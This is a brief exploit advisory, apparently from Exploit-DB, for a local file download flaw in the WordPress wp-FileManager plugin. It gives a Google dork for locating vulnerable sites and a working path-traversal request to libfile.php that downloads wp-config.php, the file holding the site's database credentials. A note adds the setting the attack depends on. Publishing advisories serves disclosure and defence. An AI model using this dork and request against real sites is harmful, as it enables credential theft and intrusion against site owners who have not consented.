WordPress wp-FileManager - Arbitrary File Download Vulnerability



Title: Wordpress wp-FileManager Local File Download Vulnerability

Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application



Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.